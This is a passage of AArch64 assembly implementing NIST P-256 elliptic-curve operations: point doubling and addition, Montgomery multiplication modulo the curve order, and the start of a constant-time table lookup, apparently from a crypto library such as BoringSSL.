.type __ecp_nistz256_div_by_2,%function
.align 4
__ecp_nistz256_div_by_2:
subs x8,x14,#1 // adds x8,x4,#-1 // tmp = a+modulus
adcs x9,x15,x12
adcs x10,x16,xzr
adcs x11,x17,x13
adc x1,xzr,xzr // zap x1
tst x14,#1 // is a even?
csel x14,x14,x8,eq // ret = even ? a : a+modulus
csel x15,x15,x9,eq
csel x16,x16,x10,eq
csel x17,x17,x11,eq
csel x1,xzr,x1,eq
lsr x14,x14,#1 // ret >>= 1
orr x14,x14,x15,lsl#63
lsr x15,x15,#1
orr x15,x15,x16,lsl#63
lsr x16,x16,#1
orr x16,x16,x17,lsl#63
lsr x17,x17,#1
stp x14,x15,[x0]
orr x17,x17,x1,lsl#63
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_div_by_2,.-__ecp_nistz256_div_by_2
.globl ecp_nistz256_point_double
.hidden ecp_nistz256_point_double
.type ecp_nistz256_point_double,%function
.align 5
ecp_nistz256_point_double:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-96]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
sub sp,sp,#32*4
.Ldouble_shortcut:
ldp x14,x15,[x1,#32]
mov x21,x0
ldp x16,x17,[x1,#48]
mov x22,x1
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
mov x8,x14
ldr x13,[x13,#24]
mov x9,x15
ldp x4,x5,[x22,#64] // forward load for p256_sqr_mont
mov x10,x16
mov x11,x17
ldp x6,x7,[x22,#64+16]
add x0,sp,#0
bl __ecp_nistz256_add_to // p256_mul_by_2(S, in_y);
add x0,sp,#64
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Zsqr, in_z);
ldp x8,x9,[x22]
ldp x10,x11,[x22,#16]
mov x4,x14 // put Zsqr aside for p256_sub
mov x5,x15
mov x6,x16
mov x7,x17
add x0,sp,#32
bl __ecp_nistz256_add_to // p256_add(M, Zsqr, in_x);
add x2,x22,#0
mov x14,x4 // restore Zsqr
mov x15,x5
ldp x4,x5,[sp,#0] // forward load for p256_sqr_mont
mov x16,x6
mov x17,x7
ldp x6,x7,[sp,#0+16]
add x0,sp,#64
bl __ecp_nistz256_sub_morf // p256_sub(Zsqr, in_x, Zsqr);
add x0,sp,#0
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(S, S);
ldr x3,[x22,#32]
ldp x4,x5,[x22,#64]
ldp x6,x7,[x22,#64+16]
add x2,x22,#32
add x0,sp,#96
bl __ecp_nistz256_mul_mont // p256_mul_mont(tmp0, in_z, in_y);
mov x8,x14
mov x9,x15
ldp x4,x5,[sp,#0] // forward load for p256_sqr_mont
mov x10,x16
mov x11,x17
ldp x6,x7,[sp,#0+16]
add x0,x21,#64
bl __ecp_nistz256_add_to // p256_mul_by_2(res_z, tmp0);
add x0,sp,#96
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(tmp0, S);
ldr x3,[sp,#64] // forward load for p256_mul_mont
ldp x4,x5,[sp,#32]
ldp x6,x7,[sp,#32+16]
add x0,x21,#32
bl __ecp_nistz256_div_by_2 // p256_div_by_2(res_y, tmp0);
add x2,sp,#64
add x0,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(M, M, Zsqr);
mov x8,x14 // duplicate M
mov x9,x15
mov x10,x16
mov x11,x17
mov x4,x14 // put M aside
mov x5,x15
mov x6,x16
mov x7,x17
add x0,sp,#32
bl __ecp_nistz256_add_to
mov x8,x4 // restore M
mov x9,x5
ldr x3,[x22] // forward load for p256_mul_mont
mov x10,x6
ldp x4,x5,[sp,#0]
mov x11,x7
ldp x6,x7,[sp,#0+16]
bl __ecp_nistz256_add_to // p256_mul_by_3(M, M);
add x2,x22,#0
add x0,sp,#0
bl __ecp_nistz256_mul_mont // p256_mul_mont(S, S, in_x);
mov x8,x14
mov x9,x15
ldp x4,x5,[sp,#32] // forward load for p256_sqr_mont
mov x10,x16
mov x11,x17
ldp x6,x7,[sp,#32+16]
add x0,sp,#96
bl __ecp_nistz256_add_to // p256_mul_by_2(tmp0, S);
add x0,x21,#0
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(res_x, M);
add x2,sp,#96
bl __ecp_nistz256_sub_from // p256_sub(res_x, res_x, tmp0);
add x2,sp,#0
add x0,sp,#0
bl __ecp_nistz256_sub_morf // p256_sub(S, S, res_x);
ldr x3,[sp,#32]
mov x4,x14 // copy S
mov x5,x15
mov x6,x16
mov x7,x17
add x2,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(S, S, M);
add x2,x21,#32
add x0,x21,#32
bl __ecp_nistz256_sub_from // p256_sub(res_y, S, res_y);
add sp,x29,#0 // destroy frame
ldp x19,x20,[x29,#16]
ldp x21,x22,[x29,#32]
ldp x29,x30,[sp],#96
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_point_double,.-ecp_nistz256_point_double
.globl ecp_nistz256_point_add
.hidden ecp_nistz256_point_add
.type ecp_nistz256_point_add,%function
.align 5
ecp_nistz256_point_add:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-96]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
sub sp,sp,#32*12
ldp x4,x5,[x2,#64] // in2_z
ldp x6,x7,[x2,#64+16]
mov x21,x0
mov x22,x1
mov x23,x2
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
orr x8,x4,x5
orr x10,x6,x7
orr x25,x8,x10
cmp x25,#0
csetm x25,ne // ~in2infty
add x0,sp,#192
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Z2sqr, in2_z);
ldp x4,x5,[x22,#64] // in1_z
ldp x6,x7,[x22,#64+16]
orr x8,x4,x5
orr x10,x6,x7
orr x24,x8,x10
cmp x24,#0
csetm x24,ne // ~in1infty
add x0,sp,#128
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Z1sqr, in1_z);
ldr x3,[x23,#64]
ldp x4,x5,[sp,#192]
ldp x6,x7,[sp,#192+16]
add x2,x23,#64
add x0,sp,#320
bl __ecp_nistz256_mul_mont // p256_mul_mont(S1, Z2sqr, in2_z);
ldr x3,[x22,#64]
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x2,x22,#64
add x0,sp,#352
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, Z1sqr, in1_z);
ldr x3,[x22,#32]
ldp x4,x5,[sp,#320]
ldp x6,x7,[sp,#320+16]
add x2,x22,#32
add x0,sp,#320
bl __ecp_nistz256_mul_mont // p256_mul_mont(S1, S1, in1_y);
ldr x3,[x23,#32]
ldp x4,x5,[sp,#352]
ldp x6,x7,[sp,#352+16]
add x2,x23,#32
add x0,sp,#352
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, S2, in2_y);
add x2,sp,#320
ldr x3,[sp,#192] // forward load for p256_mul_mont
ldp x4,x5,[x22]
ldp x6,x7,[x22,#16]
add x0,sp,#160
bl __ecp_nistz256_sub_from // p256_sub(R, S2, S1);
orr x14,x14,x15 // see if result is zero
orr x16,x16,x17
orr x26,x14,x16 // ~is_equal(S1,S2)
add x2,sp,#192
add x0,sp,#256
bl __ecp_nistz256_mul_mont // p256_mul_mont(U1, in1_x, Z2sqr);
ldr x3,[sp,#128]
ldp x4,x5,[x23]
ldp x6,x7,[x23,#16]
add x2,sp,#128
add x0,sp,#288
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, in2_x, Z1sqr);
add x2,sp,#256
ldp x4,x5,[sp,#160] // forward load for p256_sqr_mont
ldp x6,x7,[sp,#160+16]
add x0,sp,#96
bl __ecp_nistz256_sub_from // p256_sub(H, U2, U1);
orr x14,x14,x15 // see if result is zero
orr x16,x16,x17
orr x14,x14,x16 // ~is_equal(U1,U2)
mvn x27,x24 // -1/0 -> 0/-1
mvn x28,x25 // -1/0 -> 0/-1
orr x14,x14,x27
orr x14,x14,x28
orr x14,x14,x26
cbnz x14,.Ladd_proceed // if(~is_equal(U1,U2) | in1infty | in2infty | ~is_equal(S1,S2))
.Ladd_double:
mov x1,x22
mov x0,x21
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
add sp,sp,#256 // #256 is from #32*(12-4). difference in stack frames
b .Ldouble_shortcut
.align 4
.Ladd_proceed:
add x0,sp,#192
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Rsqr, R);
ldr x3,[x22,#64]
ldp x4,x5,[sp,#96]
ldp x6,x7,[sp,#96+16]
add x2,x22,#64
add x0,sp,#64
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_z, H, in1_z);
ldp x4,x5,[sp,#96]
ldp x6,x7,[sp,#96+16]
add x0,sp,#128
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Hsqr, H);
ldr x3,[x23,#64]
ldp x4,x5,[sp,#64]
ldp x6,x7,[sp,#64+16]
add x2,x23,#64
add x0,sp,#64
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_z, res_z, in2_z);
ldr x3,[sp,#96]
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x2,sp,#96
add x0,sp,#224
bl __ecp_nistz256_mul_mont // p256_mul_mont(Hcub, Hsqr, H);
ldr x3,[sp,#128]
ldp x4,x5,[sp,#256]
ldp x6,x7,[sp,#256+16]
add x2,sp,#128
add x0,sp,#288
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, U1, Hsqr);
mov x8,x14
mov x9,x15
mov x10,x16
mov x11,x17
add x0,sp,#128
bl __ecp_nistz256_add_to // p256_mul_by_2(Hsqr, U2);
add x2,sp,#192
add x0,sp,#0
bl __ecp_nistz256_sub_morf // p256_sub(res_x, Rsqr, Hsqr);
add x2,sp,#224
bl __ecp_nistz256_sub_from // p256_sub(res_x, res_x, Hcub);
add x2,sp,#288
ldr x3,[sp,#224] // forward load for p256_mul_mont
ldp x4,x5,[sp,#320]
ldp x6,x7,[sp,#320+16]
add x0,sp,#32
bl __ecp_nistz256_sub_morf // p256_sub(res_y, U2, res_x);
add x2,sp,#224
add x0,sp,#352
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, S1, Hcub);
ldr x3,[sp,#160]
ldp x4,x5,[sp,#32]
ldp x6,x7,[sp,#32+16]
add x2,sp,#160
add x0,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_y, res_y, R);
add x2,sp,#352
bl __ecp_nistz256_sub_from // p256_sub(res_y, res_y, S2);
ldp x4,x5,[sp,#0] // res
ldp x6,x7,[sp,#0+16]
ldp x8,x9,[x23] // in2
ldp x10,x11,[x23,#16]
ldp x14,x15,[x22,#0] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#0+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+0+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+0+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#0+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#0+48]
stp x14,x15,[x21,#0]
stp x16,x17,[x21,#0+16]
ldp x14,x15,[x22,#32] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#32+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+32+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+32+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#32+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#32+48]
stp x14,x15,[x21,#32]
stp x16,x17,[x21,#32+16]
ldp x14,x15,[x22,#64] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#64+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
csel x14,x8,x14,ne
csel x15,x9,x15,ne
csel x16,x10,x16,ne
csel x17,x11,x17,ne
stp x14,x15,[x21,#64]
stp x16,x17,[x21,#64+16]
.Ladd_done:
add sp,x29,#0 // destroy frame
ldp x19,x20,[x29,#16]
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldp x29,x30,[sp],#96
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_point_add,.-ecp_nistz256_point_add
.globl ecp_nistz256_point_add_affine
.hidden ecp_nistz256_point_add_affine
.type ecp_nistz256_point_add_affine,%function
.align 5
ecp_nistz256_point_add_affine:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-80]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
sub sp,sp,#32*10
mov x21,x0
mov x22,x1
mov x23,x2
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
ldp x4,x5,[x1,#64] // in1_z
ldp x6,x7,[x1,#64+16]
orr x8,x4,x5
orr x10,x6,x7
orr x24,x8,x10
cmp x24,#0
csetm x24,ne // ~in1infty
ldp x14,x15,[x2] // in2_x
ldp x16,x17,[x2,#16]
ldp x8,x9,[x2,#32] // in2_y
ldp x10,x11,[x2,#48]
orr x14,x14,x15
orr x16,x16,x17
orr x8,x8,x9
orr x10,x10,x11
orr x14,x14,x16
orr x8,x8,x10
orr x25,x14,x8
cmp x25,#0
csetm x25,ne // ~in2infty
add x0,sp,#128
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Z1sqr, in1_z);
mov x4,x14
mov x5,x15
mov x6,x16
mov x7,x17
ldr x3,[x23]
add x2,x23,#0
add x0,sp,#96
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, Z1sqr, in2_x);
add x2,x22,#0
ldr x3,[x22,#64] // forward load for p256_mul_mont
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x0,sp,#160
bl __ecp_nistz256_sub_from // p256_sub(H, U2, in1_x);
add x2,x22,#64
add x0,sp,#128
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, Z1sqr, in1_z);
ldr x3,[x22,#64]
ldp x4,x5,[sp,#160]
ldp x6,x7,[sp,#160+16]
add x2,x22,#64
add x0,sp,#64
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_z, H, in1_z);
ldr x3,[x23,#32]
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x2,x23,#32
add x0,sp,#128
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, S2, in2_y);
add x2,x22,#32
ldp x4,x5,[sp,#160] // forward load for p256_sqr_mont
ldp x6,x7,[sp,#160+16]
add x0,sp,#192
bl __ecp_nistz256_sub_from // p256_sub(R, S2, in1_y);
add x0,sp,#224
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Hsqr, H);
ldp x4,x5,[sp,#192]
ldp x6,x7,[sp,#192+16]
add x0,sp,#288
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Rsqr, R);
ldr x3,[sp,#160]
ldp x4,x5,[sp,#224]
ldp x6,x7,[sp,#224+16]
add x2,sp,#160
add x0,sp,#256
bl __ecp_nistz256_mul_mont // p256_mul_mont(Hcub, Hsqr, H);
ldr x3,[x22]
ldp x4,x5,[sp,#224]
ldp x6,x7,[sp,#224+16]
add x2,x22,#0
add x0,sp,#96
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, in1_x, Hsqr);
mov x8,x14
mov x9,x15
mov x10,x16
mov x11,x17
add x0,sp,#224
bl __ecp_nistz256_add_to // p256_mul_by_2(Hsqr, U2);
add x2,sp,#288
add x0,sp,#0
bl __ecp_nistz256_sub_morf // p256_sub(res_x, Rsqr, Hsqr);
add x2,sp,#256
bl __ecp_nistz256_sub_from // p256_sub(res_x, res_x, Hcub);
add x2,sp,#96
ldr x3,[x22,#32] // forward load for p256_mul_mont
ldp x4,x5,[sp,#256]
ldp x6,x7,[sp,#256+16]
add x0,sp,#32
bl __ecp_nistz256_sub_morf // p256_sub(res_y, U2, res_x);
add x2,x22,#32
add x0,sp,#128
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, in1_y, Hcub);
ldr x3,[sp,#192]
ldp x4,x5,[sp,#32]
ldp x6,x7,[sp,#32+16]
add x2,sp,#192
add x0,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_y, res_y, R);
add x2,sp,#128
bl __ecp_nistz256_sub_from // p256_sub(res_y, res_y, S2);
ldp x4,x5,[sp,#0] // res
ldp x6,x7,[sp,#0+16]
ldp x8,x9,[x23] // in2
ldp x10,x11,[x23,#16]
ldp x14,x15,[x22,#0] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#0+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+0+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+0+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#0+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#0+48]
stp x14,x15,[x21,#0]
stp x16,x17,[x21,#0+16]
adrp x23,.Lone_mont-64
add x23,x23,:lo12:.Lone_mont-64
ldp x14,x15,[x22,#32] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#32+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+32+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+32+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#32+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#32+48]
stp x14,x15,[x21,#32]
stp x16,x17,[x21,#32+16]
ldp x14,x15,[x22,#64] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#64+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
csel x14,x8,x14,ne
csel x15,x9,x15,ne
csel x16,x10,x16,ne
csel x17,x11,x17,ne
stp x14,x15,[x21,#64]
stp x16,x17,[x21,#64+16]
add sp,x29,#0 // destroy frame
ldp x19,x20,[x29,#16]
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x29,x30,[sp],#80
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_point_add_affine,.-ecp_nistz256_point_add_affine
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_ord_mul_mont(uint64_t res[4], uint64_t a[4],
// uint64_t b[4]);
.globl ecp_nistz256_ord_mul_mont
.hidden ecp_nistz256_ord_mul_mont
.type ecp_nistz256_ord_mul_mont,%function
.align 4
ecp_nistz256_ord_mul_mont:
AARCH64_VALID_CALL_TARGET
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
stp x29,x30,[sp,#-64]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
adrp x23,.Lord
add x23,x23,:lo12:.Lord
ldr x3,[x2] // bp[0]
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
ldp x12,x13,[x23,#0]
ldp x21,x22,[x23,#16]
ldr x23,[x23,#32]
mul x14,x4,x3 // a[0]*b[0]
umulh x8,x4,x3
mul x15,x5,x3 // a[1]*b[0]
umulh x9,x5,x3
mul x16,x6,x3 // a[2]*b[0]
umulh x10,x6,x3
mul x17,x7,x3 // a[3]*b[0]
umulh x19,x7,x3
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts of multiplication
adcs x16,x16,x9
adcs x17,x17,x10
adc x19,x19,xzr
mov x20,xzr
ldr x3,[x2,#8*1] // b[i]
lsl x8,x24,#32
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
mul x8,x4,x3
adc x11,x11,xzr
mul x9,x5,x3
adds x14,x15,x10
mul x10,x6,x3
adcs x15,x16,x11
mul x11,x7,x3
adcs x16,x17,x24
adcs x17,x19,x24
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts
umulh x8,x4,x3
adcs x15,x15,x9
umulh x9,x5,x3
adcs x16,x16,x10
umulh x10,x6,x3
adcs x17,x17,x11
umulh x11,x7,x3
adc x19,x19,xzr
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts
adcs x16,x16,x9
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
ldr x3,[x2,#8*2] // b[i]
lsl x8,x24,#32
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
mul x8,x4,x3
adc x11,x11,xzr
mul x9,x5,x3
adds x14,x15,x10
mul x10,x6,x3
adcs x15,x16,x11
mul x11,x7,x3
adcs x16,x17,x24
adcs x17,x19,x24
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts
umulh x8,x4,x3
adcs x15,x15,x9
umulh x9,x5,x3
adcs x16,x16,x10
umulh x10,x6,x3
adcs x17,x17,x11
umulh x11,x7,x3
adc x19,x19,xzr
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts
adcs x16,x16,x9
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
ldr x3,[x2,#8*3] // b[i]
lsl x8,x24,#32
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
mul x8,x4,x3
adc x11,x11,xzr
mul x9,x5,x3
adds x14,x15,x10
mul x10,x6,x3
adcs x15,x16,x11
mul x11,x7,x3
adcs x16,x17,x24
adcs x17,x19,x24
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts
umulh x8,x4,x3
adcs x15,x15,x9
umulh x9,x5,x3
adcs x16,x16,x10
umulh x10,x6,x3
adcs x17,x17,x11
umulh x11,x7,x3
adc x19,x19,xzr
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts
adcs x16,x16,x9
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
lsl x8,x24,#32 // last reduction
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
adc x11,x11,xzr
adds x14,x15,x10
adcs x15,x16,x11
adcs x16,x17,x24
adcs x17,x19,x24
adc x19,x20,xzr
subs x8,x14,x12 // ret -= modulus
sbcs x9,x15,x13
sbcs x10,x16,x21
sbcs x11,x17,x22
sbcs xzr,x19,xzr
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ldp x19,x20,[sp,#16]
ldp x21,x22,[sp,#32]
ldp x23,x24,[sp,#48]
ldr x29,[sp],#64
ret
.size ecp_nistz256_ord_mul_mont,.-ecp_nistz256_ord_mul_mont
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_ord_sqr_mont(uint64_t res[4], uint64_t a[4],
// uint64_t rep);
.globl ecp_nistz256_ord_sqr_mont
.hidden ecp_nistz256_ord_sqr_mont
.type ecp_nistz256_ord_sqr_mont,%function
.align 4
ecp_nistz256_ord_sqr_mont:
AARCH64_VALID_CALL_TARGET
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
stp x29,x30,[sp,#-64]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
adrp x23,.Lord
add x23,x23,:lo12:.Lord
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
ldp x12,x13,[x23,#0]
ldp x21,x22,[x23,#16]
ldr x23,[x23,#32]
b .Loop_ord_sqr
.align 4
.Loop_ord_sqr:
sub x2,x2,#1
////////////////////////////////////////////////////////////////
// | | | | | |a1*a0| |
// | | | | |a2*a0| | |
// | |a3*a2|a3*a0| | | |
// | | | |a2*a1| | | |
// | | |a3*a1| | | | |
// *| | | | | | | | 2|
// +|a3*a3|a2*a2|a1*a1|a0*a0|
// |--+--+--+--+--+--+--+--|
// |A7|A6|A5|A4|A3|A2|A1|A0|, where Ax is , i.e. follow
//
// "can't overflow" below mark carrying into high part of
// multiplication result, which can't overflow, because it
// can never be all ones.
mul x15,x5,x4 // a[1]*a[0]
umulh x9,x5,x4
mul x16,x6,x4 // a[2]*a[0]
umulh x10,x6,x4
mul x17,x7,x4 // a[3]*a[0]
umulh x19,x7,x4
adds x16,x16,x9 // accumulate high parts of multiplication
mul x8,x6,x5 // a[2]*a[1]
umulh x9,x6,x5
adcs x17,x17,x10
mul x10,x7,x5 // a[3]*a[1]
umulh x11,x7,x5
adc x19,x19,xzr // can't overflow
mul x20,x7,x6 // a[3]*a[2]
umulh x1,x7,x6
adds x9,x9,x10 // accumulate high parts of multiplication
mul x14,x4,x4 // a[0]*a[0]
adc x10,x11,xzr // can't overflow
adds x17,x17,x8 // accumulate low parts of multiplication
umulh x4,x4,x4
adcs x19,x19,x9
mul x9,x5,x5 // a[1]*a[1]
adcs x20,x20,x10
umulh x5,x5,x5
adc x1,x1,xzr // can't overflow
adds x15,x15,x15 // acc[1-6]*=2
mul x10,x6,x6 // a[2]*a[2]
adcs x16,x16,x16
umulh x6,x6,x6
adcs x17,x17,x17
mul x11,x7,x7 // a[3]*a[3]
adcs x19,x19,x19
umulh x7,x7,x7
adcs x20,x20,x20
adcs x1,x1,x1
adc x3,xzr,xzr
adds x15,x15,x4 // +a[i]*a[i]
mul x24,x14,x23
adcs x16,x16,x9
adcs x17,x17,x5
adcs x19,x19,x10
adcs x20,x20,x6
adcs x1,x1,x11
adc x3,x3,x7
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
adc x11,x11,xzr
adds x14,x15,x10
adcs x15,x16,x11
adcs x16,x17,x24
adc x17,xzr,x24 // can't overflow
mul x11,x14,x23
lsl x8,x24,#32
subs x15,x15,x24
lsr x9,x24,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
subs xzr,x14,#1
umulh x9,x12,x11
mul x10,x13,x11
umulh x24,x13,x11
adcs x10,x10,x9
adc x24,x24,xzr
adds x14,x15,x10
adcs x15,x16,x24
adcs x16,x17,x11
adc x17,xzr,x11 // can't overflow
mul x24,x14,x23
lsl x8,x11,#32
subs x15,x15,x11
lsr x9,x11,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
adc x11,x11,xzr
adds x14,x15,x10
adcs x15,x16,x11
adcs x16,x17,x24
adc x17,xzr,x24 // can't overflow
mul x11,x14,x23
lsl x8,x24,#32
subs x15,x15,x24
lsr x9,x24,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
subs xzr,x14,#1
umulh x9,x12,x11
mul x10,x13,x11
umulh x24,x13,x11
adcs x10,x10,x9
adc x24,x24,xzr
adds x14,x15,x10
adcs x15,x16,x24
adcs x16,x17,x11
adc x17,xzr,x11 // can't overflow
lsl x8,x11,#32
subs x15,x15,x11
lsr x9,x11,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
adds x14,x14,x19 // accumulate upper half
adcs x15,x15,x20
adcs x16,x16,x1
adcs x17,x17,x3
adc x19,xzr,xzr
subs x8,x14,x12 // ret -= modulus
sbcs x9,x15,x13
sbcs x10,x16,x21
sbcs x11,x17,x22
sbcs xzr,x19,xzr
csel x4,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x5,x15,x9,lo
csel x6,x16,x10,lo
csel x7,x17,x11,lo
cbnz x2,.Loop_ord_sqr
stp x4,x5,[x0]
stp x6,x7,[x0,#16]
ldp x19,x20,[sp,#16]
ldp x21,x22,[sp,#32]
ldp x23,x24,[sp,#48]
ldr x29,[sp],#64
ret
.size ecp_nistz256_ord_sqr_mont,.-ecp_nistz256_ord_sqr_mont
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_select_w5(uint64_t *val, uint64_t *in_t, int index);
.globl ecp_nistz256_select_w5
.hidden ecp_nistz256_select_w5
.type ecp_nistz256_select_w5,%function
.align 4
ecp_nistz256_select_w5:
AARCH64_VALID_CALL_TARGET
// x10 := x0
// w9 := 0; loop counter and incremented internal index
mov x10, x0
mov w9, #0
// [v16-v21] := 0
movi v16.16b, #0
movi v17.16b, #0
movi v18.16b, #0
